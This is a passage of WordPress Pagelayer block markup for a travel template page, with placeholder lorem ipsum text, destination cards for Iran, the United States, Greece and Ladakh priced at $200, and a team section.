{\"ele_bg_hover_delay\":\"400\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin_tablet\":\"0em,0em,2em,0em\",\"ele_padding_mobile\":\"0px,0px,35px,0px\",\"text\":\"\\u003cp\\u003eNullam eget dolor sit amet sed diam nonummy nibh euismodor sit voluptatem accusantium doloremque laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi beatae.\\u003c\\/p\\u003e\",\"pagelayer-id\":\"44l7184\"} --><p>Nullam eget dolor sit amet sed diam nonummy nibh euismodor sit voluptatem accusantium doloremque laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi beatae.</p><!-- /wp:pagelayer/pl_text -->\n<!-- /wp:pagelayer/pl_inner_col -->\n<!-- wp:pagelayer/pl_inner_col {\"widget_space\":\"15\",\"overlay_hover_delay\":\"400\",\"col\":\"6\",\"animation\":\"\",\"animation_delay\":\"600\",\"pagelayer-id\":\"uqf6808\"} -->\n<!-- wp:pagelayer/pl_image {\"id\":\"13\",\"id-size\":\"full\",\"align\":\"center\",\"img_hover\":\"normal\",\"img_hover_delay\":\"400\",\"caption_color\":\"#3E8EF7\",\"ele_bg_hover_delay\":\"400\",\"overlay\":\"true\",\"icon\":\"\",\"icon_color\":\"#eeaa6dff\",\"icon_size\":\"65\",\"overlay_bg_type\":\"color\",\"overlay_bg\":\"#0000001c\",\"content_position\":\"center\",\"show_always\":\"true\",\"link_type\":\"custom_url\",\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=WTagooKJMjE\",\"target\":\"true\",\"animation\":\"\",\"animation_delay\":\"700\",\"max-width_tablet\":\"100\",\"text\":\"\\n\",\"pagelayer-id\":\"ivt7491\"} -->\n<!-- /wp:pagelayer/pl_image -->\n<!-- /wp:pagelayer/pl_inner_col -->\n<!-- /wp:pagelayer/pl_inner_row -->\n<!-- /wp:pagelayer/pl_col -->\n<!-- /wp:pagelayer/pl_row -->\n<!-- wp:pagelayer/pl_row {\"stretch\":\"full\",\"col_gap\":\"0\",\"width_content\":\"full\",\"row_height\":\"default\",\"overlay_hover_delay\":\"400\",\"row_shape_top_color\":\"#fff\",\"row_shape_top_width\":\"100\",\"row_shape_top_height\":\"100\",\"row_shape_bottom_color\":\"#fff\",\"row_shape_bottom_width\":\"100\",\"row_shape_bottom_height\":\"100\",\"ele_bg_hover_delay\":\"400\",\"ele_padding\":\"5em,0em,0em,0em\",\"ele_padding_mobile\":\"2em,0em,0em,0em\",\"ele_padding_tablet\":\"3em,0em,0em,0em\",\"pagelayer-id\":\"00l6073\"} -->\n<!-- wp:pagelayer/pl_col {\"widget_space\":\"0\",\"overlay_hover_delay\":\"400\",\"ele_bg_hover_delay\":\"400\",\"pagelayer-id\":\"jqp4478\"} -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"text\":\"\\u003ch6\\u003eJourney\\u003c\\/h6\\u003e\",\"pagelayer-id\":\"w4b1723\"} --><h6>Journey</h6><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"-4px,0px,0px,0px\",\"text\":\"\\u003ch5\\u003eYour Journey Starts Here\\u003c\\/h5\\u003e\",\"pagelayer-id\":\"gcs5391\"} --><h5>Your Journey Starts Here</h5><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"-65px,0px,0px,0px\",\"ele_zindex\":\"-1\",\"heading_typo_mobile\":\",60,,,,,Solid,,,,\",\"text\":\"\\u003ch2\\u003eStarts\\u003c\\/h2\\u003e\",\"pagelayer-id\":\"ovs9605\"} --><h2>Starts</h2><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_text {\"ele_bg_hover_delay\":\"400\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"1em,0em,2em,0em\",\"ele_padding_mobile\":\"1px,10px,1px,10px\",\"text\":\"\\u003cp style=\\u0022text-align: center\\u0022\\u003eNulla posuere sollicitudin aliquam ultrices. Id consectetur purus ut faucibus pulvinar elementum integer enim. \\u003cbr \\/\\u003eAmet commodo nulla facilisi nullam vehicula. Eu turpis egestas pretium aenean pharetra.\\u003cbr \\/\\u003e Nibh venenatis cras sed felis eget velit aliquet sagittis.\\u003c\\/p\\u003e\",\"ele_custom_pos\":\"true\",\"ele_align\":\"50%\",\"ele_height\":\"auto\",\"ele_custom_width\":\"650px\",\"pagelayer-id\":\"u1h3147\"} --><p style=\"text-align: center\">Nulla posuere sollicitudin aliquam ultrices. Id consectetur purus ut faucibus pulvinar elementum integer enim. <br />Amet commodo nulla facilisi nullam vehicula. Eu turpis egestas pretium aenean pharetra.<br /> Nibh venenatis cras sed felis eget velit aliquet sagittis.</p><!-- /wp:pagelayer/pl_text -->\n<!-- wp:pagelayer/pl_inner_row {\"stretch\":\"full\",\"col_gap\":\"0\",\"width_content\":\"full\",\"row_height\":\"default\",\"overlay_hover_delay\":\"400\",\"row_shape_top_color\":\"#227bc3\",\"row_shape_top_width\":\"100\",\"row_shape_top_height\":\"100\",\"row_shape_bottom_color\":\"#e44993\",\"row_shape_bottom_width\":\"100\",\"row_shape_bottom_height\":\"100\",\"pagelayer-id\":\"hif8189\"} -->\n<!-- wp:pagelayer/pl_inner_col {\"widget_space\":\"15\",\"overlay_hover_delay\":\"400\",\"col\":\"8\",\"pagelayer-id\":\"phd9001\"} -->\n<!-- wp:pagelayer/pl_image {\"id\":\"11\",\"id-size\":\"full\",\"align\":\"center\",\"img_hover\":\"normal\",\"img_hover_delay\":\"400\",\"caption_color\":\"#3E8EF7\",\"ele_bg_hover_delay\":\"400\",\"overlay\":\"true\",\"icon\":\"\",\"icon_color\":\"#eeaa6dff\",\"icon_size\":\"65\",\"overlay_bg_type\":\"color\",\"overlay_bg\":\"#0000001c\",\"content_position\":\"center\",\"show_always\":\"true\",\"link_type\":\"custom_url\",\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=WTagooKJMjE\",\"target\":\"true\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin_mobile\":\"0em,0em,3em,0em\",\"text\":\"\\n\",\"pagelayer-id\":\"q4y7131\"} -->\n<!-- /wp:pagelayer/pl_image -->\n<!-- /wp:pagelayer/pl_inner_col -->\n<!-- wp:pagelayer/pl_inner_col {\"widget_space\":\"15\",\"overlay_hover_delay\":\"400\",\"ele_bg_hover_delay\":\"400\",\"col\":\"4\",\"content_pos\":\"center\",\"ele_padding\":\"0px,50px,0px,60px\",\"ele_padding_tablet\":\"60px,20px,60px,20px\",\"ele_padding_mobile\":\"0px,10px,0px,10px\",\"pagelayer-id\":\"mew6029\"} -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"-16px,0px,0px,0px\",\"text\":\"\\u003ch5\\u003eIran\\u003c\\/h5\\u003e\",\"pagelayer-id\":\"r4f2696\"} --><h5>Iran</h5><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"-44px,0px,0px,0px\",\"ele_zindex\":\"-1\",\"text\":\"\\u003ch3\\u003eIran\\u003c\\/h3\\u003e\",\"pagelayer-id\":\"oeu5019\"} --><h3>Iran</h3><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_text {\"ele_bg_hover_delay\":\"400\",\"animation\":\"\",\"ele_padding_tablet\":\"0px,15px,0px,15px\",\"animation_delay\":\"600\",\"text\":\"\\u003cp\\u003e Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. \\u003c\\/p\\u003e\",\"pagelayer-id\":\"rvc1332\"} --><p> Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. </p><!-- /wp:pagelayer/pl_text -->\n<!-- wp:pagelayer/pl_btn {\"text\":\"$200.00\",\"align\":\"center\",\"type\":\"pagelayer-btn-custom\",\"size\":\"pagelayer-btn-small\",\"btn_hover_delay\":\"400\",\"icon_position\":\"pagelayer-btn-icon-left\",\"icon_spacing\":\"5\",\"btn_border_type\":\"solid\",\"btn_border_color\":\"\",\"btn_border_radius\":\"0,0,0,0\",\"btn_border_width\":\"0,0,0,0\",\"btn_bg_color\":\"#efba6cff\",\"btn_color\":\"#ffffff\",\"ele_margin_mobile\":\"0em,0em,3em,0em\",\"btn_bg_color_hover\":\"\",\"btn_hover\":\"hover\",\"btn_color_hover\":\"#ffffffff\",\"pagelayer-id\":\"pdi7261\"} /-->\n<!-- /wp:pagelayer/pl_inner_col -->\n<!-- /wp:pagelayer/pl_inner_row -->\n<!-- wp:pagelayer/pl_inner_row {\"stretch\":\"full\",\"col_gap\":\"0\",\"width_content\":\"full\",\"row_height\":\"default\",\"overlay_hover_delay\":\"400\",\"row_shape_top_color\":\"#227bc3\",\"row_shape_top_width\":\"100\",\"row_shape_top_height\":\"100\",\"row_shape_bottom_color\":\"#e44993\",\"row_shape_bottom_width\":\"100\",\"row_shape_bottom_height\":\"100\",\"ele_css\":\"@media screen and (max-width: 768px){\\n{{element}} .pagelayer-row-holder{\\ndisplay: flex;\\nflex-direction: column-reverse;\\n}\\n}\",\"pagelayer-id\":\"nih6890\"} -->\n<!-- wp:pagelayer/pl_inner_col {\"widget_space\":\"15\",\"overlay_hover_delay\":\"400\",\"ele_bg_hover_delay\":\"400\",\"col\":\"4\",\"content_pos\":\"center\",\"ele_padding\":\"0px,50px,0px,60px\",\"ele_padding_tablet\":\"60px,25px,60px,25px\",\"ele_padding_mobile\":\"60px,10px,60px,10px\",\"pagelayer-id\":\"keu7767\"} -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"-16px,0px,0px,0px\",\"text\":\"\\u003ch5\\u003eUnited States\\u003c\\/h5\\u003e\",\"pagelayer-id\":\"hj58313\"} --><h5>United States</h5><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"-50px,0px,0px,0px\",\"ele_zindex\":\"-1\",\"text\":\"\\u003ch3\\u003eUnited States\\u003c\\/h3\\u003e\",\"pagelayer-id\":\"gu02957\"} --><h3>United States</h3><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_text {\"ele_bg_hover_delay\":\"400\",\"animation\":\"\",\"text\":\"\\u003cp\\u003e Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. \\u003c\\/p\\u003e\",\"pagelayer-id\":\"3l72038\"} --><p> Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. </p><!-- /wp:pagelayer/pl_text -->\n<!-- wp:pagelayer/pl_btn {\"text\":\"$200.00\",\"align\":\"center\",\"type\":\"pagelayer-btn-custom\",\"size\":\"pagelayer-btn-small\",\"btn_hover_delay\":\"400\",\"icon_position\":\"pagelayer-btn-icon-left\",\"icon_spacing\":\"5\",\"btn_border_type\":\"solid\",\"btn_border_color\":\"\",\"btn_border_radius\":\"0,0,0,0\",\"btn_border_width\":\"0,0,0,0\",\"btn_bg_color\":\"#efba6cff\",\"btn_color\":\"#ffffff\",\"btn_hover\":\"hover\",\"btn_color_hover\":\"#ffffffff\",\"pagelayer-id\":\"0701091\"} /-->\n<!-- /wp:pagelayer/pl_inner_col -->\n<!-- wp:pagelayer/pl_inner_col {\"widget_space\":\"15\",\"overlay_hover_delay\":\"400\",\"col\":\"8\",\"pagelayer-id\":\"ghu2730\"} -->\n<!-- wp:pagelayer/pl_image {\"id\":\"11\",\"id-size\":\"full\",\"align\":\"center\",\"img_hover\":\"normal\",\"img_hover_delay\":\"400\",\"caption_color\":\"#3E8EF7\",\"ele_bg_hover_delay\":\"400\",\"overlay\":\"true\",\"icon\":\"\",\"icon_color\":\"#eeaa6dff\",\"icon_size\":\"65\",\"overlay_bg_type\":\"color\",\"overlay_bg\":\"#0000001c\",\"content_position\":\"center\",\"show_always\":\"true\",\"link_type\":\"custom_url\",\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=WTagooKJMjE\",\"target\":\"true\",\"animation\":\"\",\"animation_delay\":\"600\",\"text\":\"\\n\",\"pagelayer-id\":\"pyk6019\"} -->\n<!-- /wp:pagelayer/pl_image -->\n<!-- /wp:pagelayer/pl_inner_col -->\n<!-- /wp:pagelayer/pl_inner_row -->\n<!-- wp:pagelayer/pl_inner_row {\"stretch\":\"full\",\"col_gap\":\"0\",\"width_content\":\"full\",\"row_height\":\"default\",\"overlay_hover_delay\":\"400\",\"row_shape_top_color\":\"#227bc3\",\"row_shape_top_width\":\"100\",\"row_shape_top_height\":\"100\",\"row_shape_bottom_color\":\"#e44993\",\"row_shape_bottom_width\":\"100\",\"row_shape_bottom_height\":\"100\",\"pagelayer-id\":\"zuh3015\"} -->\n<!-- wp:pagelayer/pl_inner_col {\"widget_space\":\"15\",\"overlay_hover_delay\":\"400\",\"col\":\"8\",\"pagelayer-id\":\"0pq7867\"} -->\n<!-- wp:pagelayer/pl_image {\"id\":\"11\",\"id-size\":\"full\",\"align\":\"center\",\"img_hover\":\"normal\",\"img_hover_delay\":\"400\",\"caption_color\":\"#3E8EF7\",\"ele_bg_hover_delay\":\"400\",\"overlay\":\"true\",\"icon\":\"\",\"icon_color\":\"#eeaa6dff\",\"icon_size\":\"65\",\"overlay_bg_type\":\"color\",\"overlay_bg\":\"#0000001c\",\"content_position\":\"center\",\"show_always\":\"true\",\"link_type\":\"custom_url\",\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=WTagooKJMjE\",\"target\":\"true\",\"animation\":\"\",\"animation_delay\":\"600\",\"text\":\"\\n\",\"pagelayer-id\":\"bhb1302\"} -->\n<!-- /wp:pagelayer/pl_image -->\n<!-- /wp:pagelayer/pl_inner_col -->\n<!-- wp:pagelayer/pl_inner_col {\"widget_space\":\"15\",\"overlay_hover_delay\":\"400\",\"ele_bg_hover_delay\":\"400\",\"col\":\"4\",\"content_pos\":\"center\",\"ele_padding\":\"0px,50px,0px,60px\",\"ele_padding_tablet\":\"60px,25px,60px,25px\",\"ele_padding_mobile\":\"60px,10px,50px,10px\",\"pagelayer-id\":\"6pk4838\"} -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"-16px,0px,0px,0px\",\"text\":\"\\u003ch5\\u003eGreece\\u003c\\/h5\\u003e\",\"pagelayer-id\":\"jtc1736\"} --><h5>Greece</h5><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"-44px,0px,0px,0px\",\"ele_zindex\":\"-1\",\"text\":\"\\u003ch3\\u003eGreece\\u003c\\/h3\\u003e\",\"pagelayer-id\":\"o482659\"} --><h3>Greece</h3><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_text {\"ele_bg_hover_delay\":\"400\",\"animation\":\"\",\"text\":\"\\u003cp\\u003e Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. \\u003c\\/p\\u003e\",\"pagelayer-id\":\"zol5629\"} --><p> Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. </p><!-- /wp:pagelayer/pl_text -->\n<!-- wp:pagelayer/pl_btn {\"text\":\"$200.00\",\"align\":\"center\",\"type\":\"pagelayer-btn-custom\",\"size\":\"pagelayer-btn-small\",\"btn_hover_delay\":\"400\",\"icon_position\":\"pagelayer-btn-icon-left\",\"icon_spacing\":\"5\",\"btn_border_type\":\"solid\",\"btn_border_color\":\"\",\"btn_border_radius\":\"0,0,0,0\",\"btn_border_width\":\"0,0,0,0\",\"btn_bg_color\":\"#efba6cff\",\"btn_color\":\"#ffffff\",\"btn_hover\":\"hover\",\"btn_color_hover\":\"#ffffffff\",\"pagelayer-id\":\"9b97127\"} /-->\n<!-- /wp:pagelayer/pl_inner_col -->\n<!-- /wp:pagelayer/pl_inner_row -->\n<!-- wp:pagelayer/pl_inner_row {\"stretch\":\"full\",\"col_gap\":\"0\",\"width_content\":\"full\",\"row_height\":\"default\",\"overlay_hover_delay\":\"400\",\"row_shape_top_color\":\"#227bc3\",\"row_shape_top_width\":\"100\",\"row_shape_top_height\":\"100\",\"row_shape_bottom_color\":\"#e44993\",\"row_shape_bottom_width\":\"100\",\"row_shape_bottom_height\":\"100\",\"ele_css\":\"@media screen and (max-width: 768px){\\n{{element}} .pagelayer-row-holder{\\ndisplay: flex;\\nflex-direction: column-reverse;\\n}\\n}\",\"pagelayer-id\":\"11l9878\"} -->\n<!-- wp:pagelayer/pl_inner_col {\"widget_space\":\"15\",\"overlay_hover_delay\":\"400\",\"ele_bg_hover_delay\":\"400\",\"col\":\"4\",\"content_pos\":\"center\",\"ele_padding\":\"0px,50px,0px,60px\",\"ele_padding_tablet\":\"60px,25px,0px,25px\",\"ele_padding_mobile\":\"60px,10px,40px,10px\",\"pagelayer-id\":\"wdu2978\"} -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"-16px,0px,0px,0px\",\"text\":\"\\u003ch5\\u003eLe Ladakh\\u003c\\/h5\\u003e\",\"pagelayer-id\":\"fcg8162\"} --><h5>Le Ladakh</h5><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"-50px,0px,0px,0px\",\"ele_zindex\":\"-1\",\"text\":\"\\u003ch3\\u003eLe Ladakh\\u003c\\/h3\\u003e\",\"pagelayer-id\":\"ioc6422\"} --><h3>Le Ladakh</h3><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_text {\"ele_bg_hover_delay\":\"400\",\"animation\":\"\",\"text\":\"\\u003cp\\u003e Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. \\u003c\\/p\\u003e\",\"pagelayer-id\":\"bdb4987\"} --><p> Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. </p><!-- /wp:pagelayer/pl_text -->\n<!-- wp:pagelayer/pl_btn {\"text\":\"$200.00\",\"align\":\"center\",\"type\":\"pagelayer-btn-custom\",\"size\":\"pagelayer-btn-small\",\"btn_hover_delay\":\"400\",\"icon_position\":\"pagelayer-btn-icon-left\",\"icon_spacing\":\"5\",\"btn_border_type\":\"solid\",\"btn_border_color\":\"\",\"btn_border_radius\":\"0,0,0,0\",\"btn_border_width\":\"0,0,0,0\",\"btn_bg_color\":\"#efba6cff\",\"btn_color\":\"#ffffff\",\"btn_hover\":\"hover\",\"btn_color_hover\":\"#ffffffff\",\"pagelayer-id\":\"dc32133\"} /-->\n<!-- /wp:pagelayer/pl_inner_col -->\n<!-- wp:pagelayer/pl_inner_col {\"widget_space\":\"15\",\"overlay_hover_delay\":\"400\",\"col\":\"8\",\"pagelayer-id\":\"2aq6545\"} -->\n<!-- wp:pagelayer/pl_image {\"id\":\"11\",\"id-size\":\"full\",\"align\":\"center\",\"img_hover\":\"normal\",\"img_hover_delay\":\"400\",\"caption_color\":\"#3E8EF7\",\"ele_bg_hover_delay\":\"400\",\"overlay\":\"true\",\"icon\":\"\",\"icon_color\":\"#eeaa6dff\",\"icon_size\":\"65\",\"overlay_bg_type\":\"color\",\"overlay_bg\":\"#0000001c\",\"content_position\":\"center\",\"show_always\":\"true\",\"link_type\":\"custom_url\",\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=WTagooKJMjE\",\"target\":\"true\",\"animation\":\"\",\"animation_delay\":\"600\",\"text\":\"\\n\",\"pagelayer-id\":\"6oq5032\"} -->\n<!-- /wp:pagelayer/pl_image -->\n<!-- /wp:pagelayer/pl_inner_col -->\n<!-- /wp:pagelayer/pl_inner_row -->\n<!-- /wp:pagelayer/pl_col -->\n<!-- /wp:pagelayer/pl_row -->\n<!-- wp:pagelayer/pl_row {\"stretch\":\"auto\",\"col_gap\":\"10\",\"width_content\":\"auto\",\"row_height\":\"default\",\"overlay_hover_delay\":\"400\",\"row_shape_top_color\":\"#fff\",\"row_shape_top_width\":\"100\",\"row_shape_top_height\":\"100\",\"row_shape_bottom_color\":\"#fff\",\"row_shape_bottom_width\":\"100\",\"row_shape_bottom_height\":\"100\",\"ele_bg_hover_delay\":\"400\",\"ele_padding\":\"5em,0em,0em,0em\",\"ele_padding_mobile\":\"2em,0em,0em,0em\",\"ele_padding_tablet\":\"3em,0em,0em,0em\",\"pagelayer-id\":\"zfw5404\"} -->\n<!-- wp:pagelayer/pl_col {\"widget_space\":\"0\",\"overlay_hover_delay\":\"400\",\"ele_bg_hover_delay\":\"400\",\"pagelayer-id\":\"luy2737\"} -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"text\":\"\\u003ch6\\u003eAmazing Staff\\u003c\\/h6\\u003e\",\"pagelayer-id\":\"37b6520\"} --><h6>Amazing Staff</h6><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"-4px,0px,0px,0px\",\"text\":\"\\u003ch5\\u003eMeet Our Team\\u003c\\/h2\\u003e\",\"pagelayer-id\":\"px01593\"} --><h5>Meet Our Team</h2><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"-65px,0px,0px,0px\",\"ele_zindex\":\"-1\",\"heading_typo_mobile\":\",60,,,,,Solid,,,,\",\"text\":\"\\u003ch2\\u003eOur Team\\u003c\\/h2\\u003e\",\"pagelayer-id\":\"gph1628\"} --><h2>Our Team</h2><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_text {\"ele_bg_hover_delay\":\"400\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"1em,0em,2em,0em\",\"ele_padding_mobile\":\"1px,10px,1px,10px\",\"text\":\"\\u003cp style=\\u0022text-align: center\\u0022\\u003eNulla posuere sollicitudin aliquam ultrices. Id consectetur purus ut faucibus pulvinar elementum integer enim. \\u003cbr \\/\\u003eAmet commodo nulla facilisi nullam vehicula. Eu turpis egestas pretium aenean pharetra.\\u003cbr \\/\\u003e Nibh venenatis cras sed felis eget velit aliquet sagittis.\\u003c\\/p\\u003e\",\"ele_custom_pos\":\"true\",\"ele_align\":\"50%\",\"ele_height\":\"auto\",\"ele_custom_width\":\"650px\",\"pagelayer-id\":\"jet7983\"} --><p style=\"text-align: center\">Nulla posuere sollicitudin aliquam ultrices. Id consectetur purus ut faucibus pulvinar elementum integer enim. <br />Amet commodo nulla facilisi nullam vehicula. Eu turpis egestas pretium aenean pharetra.<br /> Nibh venenatis cras sed felis eget velit aliquet sagittis.</p><!-- /wp:pagelayer/pl_text -->\n<!-- wp:pagelayer/pl_inner_row {\"stretch\":\"auto\",\"col_gap\":\"10\",\"width_content\":\"auto\",\"row_height\":\"default\",\"overlay_hover_delay\":\"400\",\"row_shape_top_color\":\"#227bc3\",\"row_shape_top_width\":\"100\",\"row_shape_top_height\":\"100\",\"row_shape_bottom_color\":\"#e44993\",\"row_shape_bottom_width\":\"100\",\"row_shape_bottom_height\":\"100\",\"ele_margin\":\"0em,0em,0em,0em\",\"pagelayer-id\":\"ona7297\"} -->\n<!-- wp:pagelayer/pl_inner_col {\"widget_space\":\"15\",\"overlay_hover_delay\":\"400\",\"col\":\"1\",\"ele_margin\":\"3em,0em,0em,0em\",\"animation\":\"\",\"animation_delay\":\"600\",\"pagelayer-id\":\"a8f4660\"} -->\n<!-- wp:pagelayer/pl_service {\"service_image\":\"4\",\"service_image_size\":\"custom\",\"service_alignment\":\"top\",\"service_vertical_alignment\":\"top\",\"img_bor_state\":\"normal\",\"img_filter\":\"0,100,100,0,0,100,100\",\"img_transition\":\"400\",\"img_filter_hover\":\"0,100,100,0,0,100,100\",\"service_heading\":\"Susan Day\",\"heading_alignment\":\"center\",\"service_title_spacing\":\"20,0,10,0\",\"heading_state\":\"normal\",\"service_heading_color\":\"#101112ff\",\"service_heading_typo\":\",18,,600,,,Solid,,Uppercase,,\",\"heading_transition\":\"400\",\"service_text_alignment\":\"center\",\"service_btn_hover_delay\":\"400\",\"service_content_spacing\":\"0,15,50,15\",\"service_image_custom_size\":\"120\",\"service_img_alignment\":\"center\",\"service_image_spacing\":\"0,0,0,0\",\"img_border_type\":\"solid\",\"img_border_color\":\"#dfdfdfff\",\"img_border_radius\":\"100%,100%,100%,100%\",\"border_type\":\"solid\",\"border_width\":\"1px,1px,1px,1px\",\"border_color\":\"#5b5959ff\",\"img_border_width\":\"1,1,1,1\",\"ele_css\":\"{{element}} .pagelayer-service-image{\\nmargin-top: -55px;\\n}\",\"ele_padding\":\"0px,0px,40px,0px\",\"service_text\":\"\\u003ch5\\u003eManager\\u003c\\/h5\\u003e\\n\\u003cp\\u003eAl alit emnos lnipedit ius, vel et hinc agam fabulas. Ut audiam invenire iracundia vim. An eam dico similique, ut sint posse sit.\\u003c\\/p\\u003e\",\"pagelayer-id\":\"fcz4396\"} --><h5>Manager</h5>\n<p>Al alit emnos lnipedit ius, vel et hinc agam fabulas. Ut audiam invenire iracundia vim. An eam dico similique, ut sint posse sit.</p><!-- /wp:pagelayer/pl_service -->\n<!-- wp:pagelayer/pl_social_grp 